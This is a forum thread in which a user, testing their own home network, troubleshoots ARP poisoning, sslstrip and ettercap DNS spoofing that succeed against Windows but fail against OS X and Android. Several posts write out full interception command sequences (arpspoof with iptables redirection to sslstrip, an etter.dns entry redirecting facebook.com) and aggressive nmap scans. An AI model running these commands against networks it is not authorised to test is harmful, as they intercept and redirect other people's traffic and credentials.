Results 1 to 10 of 10

Thread: Arp Blocked Against OSX

  1. #1
    Just burned his ISO
    Join Date
    Jun 2012
    Posts
    4

    Default Arp Blocked Against OSX

    Hi guys
    I'm testing some attacks against the machines of my private network.
    I've got 1 xp machine 1 seven machine 1 ipad 1 Mac Book Pro and 1 android phone.
    In the last 2 days I stresstested theese pcs with dns spoofing (ettercap).
    Microsoft OS Machines are completely "spoofable" but there's no way to redirect traffic of OSX and android machines.
    Are there any spacial commands to run to complete an attack against non Microsoft OS Machines??

  2. #2
    Just burned his ISO
    Join Date
    Jun 2012
    Posts
    5

    Default Re: Arp Blocked Against OSX

    If you're on a switched LAN you can try with macof

  3. #3
    Very good friend of the forum maverik35's Avatar
    Join Date
    Sep 2009
    Location
    Debian land
    Posts
    734

    Default Re: Arp Blocked Against OSX

    I've been able to spoof mac osx in one ocation, and sniff..Also with android cell phones...

    Have you tried nmap this 2 devices and see what is at their ports?..Need to see what is going on in those devices...Make a deep scan:

    nmap -sC -sS -sV -PN -p- -T4 -O --osscan-guess xxx.xxx.xxx.xxx,xxx (Put here the ip of MacOSX and the Android: 192.168.1.120,121) or one by one.

    ...It will take some time since it will scan not only the first 1024 ports and some high ports (nmap Default) , but all 65535 ports.

    Then analyze the info. There must be something listening in ports, some aplication or something avoiding the ARP Poissoning.

    Also use the arp -a and the Wireshark to analyze ports and arp protocols.

  4. #4
    My life is this forum thorin's Avatar
    Join Date
    Jan 2010
    Posts
    2,629

    Default Re: Arp Blocked Against OSX

    @prelite
    Microsoft OS Machines are completely "spoofable" but there's no way to redirect traffic of OSX and android machines.
    Please be more specific. What did you try? What happened when you tried? etc.

    @all / @maverik35
    Just to simplify if you're going to do script scanning (-sC), version detection (-sV), and OS fingerprinting (-O) you may as well just use the -A switch and shorten things up:

    Code:
    nmap -sS -PN -p- -T4 -A --osscan-guess xxx.xxx.xxx.xxx,xxx
    Further since it's the OP's own network there's no reason to be at all polite in the timing: may as well use -T5, and chances are you don't need to resolve host names so save yourself some time by adding -n for no DNS resolution.

    Lastly while I believe -PN still works and will continue to for a number of future versions, you may want to start using -Pn as they're trying to be consistent across options and how things are enabled/disabled. (You can see from nmap --help this has been changed recently.)
    Last edited by thorin; 07-16-2012 at 08:34 AM.
    I'm a compulsive post editor, you might wanna wait until my post has been online for 5-10 mins before quoting it as it will likely change.

    I know I seem harsh in some of my replies. SORRY! But if you're doing something illegal or posting something that seems to be obvious BS I'm going to call you on it.

  5. #5
    Just burned his ISO
    Join Date
    Jun 2012
    Posts
    4

    Default Re: Arp Blocked Against OSX

    First of all I wanna thank you all for your answer.
    Please excuse me if I write you back late but the last week I was on holiday.
    Please be more specific. What did you try? What happened when you tried? etc.
    Here it is what I actually try:
    Code:
    echo 1 > /proc/sys/net/ipv4/ip_forward
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000 --> Also tried with port 8080 or 443
    sslstrip -l 10000
    arpspoof -i wlan0 -t victimIP routerIP
    or this:

    Code:
    echo 1 > /proc/sys/net/ipv4/ip_forward
    locate etter.nds
    nano /usr/share/ettercap/etter.dns 
    For exemple I put the follow line in the file etter.dns
    *.facebook.com	A	XXX.XXX.XXX.XXX
    ettercap -T -q -i wlan0 -P dns_spoof -M arp // //
    With the arpspoof, sslstrip doesn't write anything in the log file and with the ettercap the victim osx/android PC/smartphone doesn't redirect the request for facebook.com to XXX.XXX.XXX.XXX.
    This instead is the result of the command "nmap -sC -sS -sV -PN -p- -T4 -O --osscan-guess xxx.xxx.xxx.xxx" launched with the osx IP machine.

    Code:
    Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-07-08 22:09 CEST
    Warning: 192.168.XXX.XXX giving up on port because retransmission cap hit (6).
    Nmap scan report for 192.168.XXX.XXX
    Host is up (0.0030s latency).
    All 65535 scanned ports on 192.168.XXX.XXX are closed (65484) or filtered (51)
    MAC Address: F0:B4:79:XX:YY:ZZ (Apple)
    Too many fingerprints match this host to give specific OS details
    Network Distance: 1 hop
    
    OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 717.49 seconds
    I'm all ears guys.

  6. #6
    My life is this forum thorin's Avatar
    Join Date
    Jan 2010
    Posts
    2,629

    Default Re: Arp Blocked Against OSX

    echo 1 > /proc/sys/net/ipv4/ip_forward
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000 --> Also tried with port 8080 or 443
    sslstrip -l 10000
    arpspoof -i wlan0 -t victimIP routerIP
    Someone correct me if I'm wrong ... I've never futzed with sslstrip but looking at this it seems like you're trying to take traffic which was destined for port 80 (regular HTTP not HTTPS) and send it to sslstrip ... what good is that?
    I'm a compulsive post editor, you might wanna wait until my post has been online for 5-10 mins before quoting it as it will likely change.

    I know I seem harsh in some of my replies. SORRY! But if you're doing something illegal or posting something that seems to be obvious BS I'm going to call you on it.

  7. #7
    Just burned his ISO
    Join Date
    Jun 2012
    Posts
    4

    Default Riferimento: Arp Blocked Against OSX

    Someone correct me if I'm wrong ... I've never futzed with sslstrip but looking at this it seems like you're trying to take traffic which was destined for port 80 (regular HTTP not HTTPS) and send it to sslstrip ...
    That's right, I'm trying to catch that kind of traffic but with the Microsoft PC it works and with the OSX or Android Machines doesn't...why?
    Last edited by prelite; 07-13-2012 at 08:21 AM.

  8. #8
    Very good friend of the forum maverik35's Avatar
    Join Date
    Sep 2009
    Location
    Debian land
    Posts
    734

    Default Re: Arp Blocked Against OSX

    Quote Originally Posted by thorin View Post
    @prelite
    Please be more specific. What did you try? What happened when you tried? etc.

    @all / @maverik35
    Just to simplify if you're going to do script scanning (-sC), version detection (-sV), and OS fingerprinting (-O) you may as well just use the -A switch and shorten things up:

    Code:
    nmap -sS -PN -p- -T4 -A --osscan-guess xxx.xxx.xxx.xxx,xxx
    Further since it's the OP's own network there's no reason to be at all polite in the timing: may as well use -T5, and chances are you don't need to resolve host names so save yourself some time by adding -n for no DNS resolution.

    Lastly while I -PN still works and will continue to for a number of future versions, you may want to start using -Pn as they're trying to be consistent across options and how things are enabled/disabled. (You can see from nmap --help this has been changed recently.)
    I do not agree with you in your statements. Why? IWhen I first got to know about nmap, I read a metasploit video (4 videos) one of them was explained by the guy who wrote the SET..In the video he uses the same as I did above..And I saw the Fyododr video using the -A option, which indeed included some options. Why the other guy uses all the parameters instead of doing it like Fyodor?...If that will make my nmap output to have wrong info, I better use the -A option...

    Why use sslstrip -l 10000?..It is a default, you do not need to do so..But does it hurts?..Redundant?...Does it work?...Yes, all of the above, as long as you know it is redundant, that it does not affect your output...

    What if I want to use DNS?..It is important to me, perhaps not to you...It depends on the people's own choice.

    If I want to be polite in timming?..Does it hurts?...If so, then let's get rid of -T1 to 4 and lets just use T5...For some reason there are all parameters available.. Because we all can use them as we think it can work best for us.

    I use -sC because if there is a pC using ssh, you can see some important info...I do not have to use some script if not needed, I'm not obligated to use them just because I use -sC...As long as you know you can use scripts...

    Yours is the best way?...

    Not to me...Sure it is another way, yes..But best?...Not to me...

  9. #9
    My life is this forum thorin's Avatar
    Join Date
    Jan 2010
    Posts
    2,629

    Default Re: Arp Blocked Against OSX

    Quote Originally Posted by maverik35 View Post
    I do not agree with you in your statements. Why? IWhen I first got to know about nmap, I read a metasploit video (4 videos) one of them was explained by the guy who wrote the SET..In the video he uses the same as I did above..And I saw the Fyododr video using the -A option, which indeed included some options. Why the other guy uses all the parameters instead of doing it like Fyodor?...If that will make my nmap output to have wrong info, I better use the -A option...
    Your right, things never change or evolve in IT, why should you adapt or learn?

    Why use sslstrip -l 10000?..It is a default, you do not need to do so..But does it hurts?..Redundant?...Does it work?...Yes, all of the above, as long as you know it is redundant, that it does not affect your output...
    Did someone ask about that part? I musta missed it.

    What if I want to use DNS?..It is important to me, perhaps not to you...It depends on the people's own choice.
    Go for it, I never said you can't or shouldn't....I said "Further since it's the OP's own network ... chances are you don't need to resolve host names so save yourself some time by adding -n for no DNS resolution."

    If I want to be polite in timming?..Does it hurts?...If so, then let's get rid of -T1 to 4 and lets just use T5...For some reason there are all parameters available.. Because we all can use them as we think it can work best for us.
    Again I didn't say NOT to use it as you suggested, I said "urther since it's the OP's own network there's no reason to be at all polite in the timing: may as well use -T5".

    I use -sC because if there is a pC using ssh, you can see some important info...I do not have to use some script if not needed, I'm not obligated to use them just because I use -sC...As long as you know you can use scripts...
    AGAIN, I never said you couldn't use -sC, I was simply pointing out that you can simplify things as -A is the same as doing -O -sC -sV.

    Yours is the best way?...
    I never claimed it was, I was simply trying to streamline things for people and increase people's pool of knowledge. But again take the advice or don't it doesn't affect me in anyway.

    Not to me...Sure it is another way, yes..But best?...Not to me...
    Wow, you just keep going and going eh? Do it however you like. Some people like to increase their knowledge pool and learn new or different ways to do things, others just do things the same way all the time. I guess you do it the same way you saw it in some tutorial along the way, hopefully nothing will ever change, and it'll never fail to work how you originally learned it.

    BTW the word "best" doesn't appear in this thread until your post....
    Last edited by thorin; 07-16-2012 at 08:34 AM.
    I'm a compulsive post editor, you might wanna wait until my post has been online for 5-10 mins before quoting it as it will likely change.

    I know I seem harsh in some of my replies. SORRY! But if you're doing something illegal or posting something that seems to be obvious BS I'm going to call you on it.

  10. #10
    My life is this forum thorin's Avatar
    Join Date
    Jan 2010
    Posts
    2,629

    Default Re: Riferimento: Arp Blocked Against OSX

    Quote Originally Posted by prelite View Post
    Quote Originally Posted by thorin View Post
    Someone correct me if I'm wrong ... I've never futzed with sslstrip but looking at this it seems like you're trying to take traffic which was destined for port 80 (regular HTTP not HTTPS) and send it to sslstrip ...
    That's right, I'm trying to catch that kind of traffic but with the Microsoft PC it works and with the OSX or Android Machines doesn't...why?
    Well if you're taking regular HTTP not HTTPS traffic and sending it to sslstrip, what's it going to strip?
    I'm a compulsive post editor, you might wanna wait until my post has been online for 5-10 mins before quoting it as it will likely change.

    I know I seem harsh in some of my replies. SORRY! But if you're doing something illegal or posting something that seems to be obvious BS I'm going to call you on it.

Similar Threads

  1. SET - Java Applet attack blocked by Avast
    By gmoraes in forum Beginners Forum
    Replies: 3
    Last Post: 12-06-2010, 09:50 PM
  2. Blocked From Website Using Wireshark
    By yukapuka in forum OLD Newbie Area
    Replies: 4
    Last Post: 07-29-2009, 11:38 AM
  3. Access blocked for a website
    By KMDave in forum OLD General IT Discussion
    Replies: 20
    Last Post: 02-17-2009, 06:05 AM
  4. blocked ports in public net
    By ~~Honcho in forum OLD Newbie Area
    Replies: 3
    Last Post: 01-10-2009, 03:31 PM
  5. pci cards getting blocked by inturrupt disable?
    By jaydag71 in forum OLD Newbie Area
    Replies: 5
    Last Post: 03-06-2008, 11:32 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •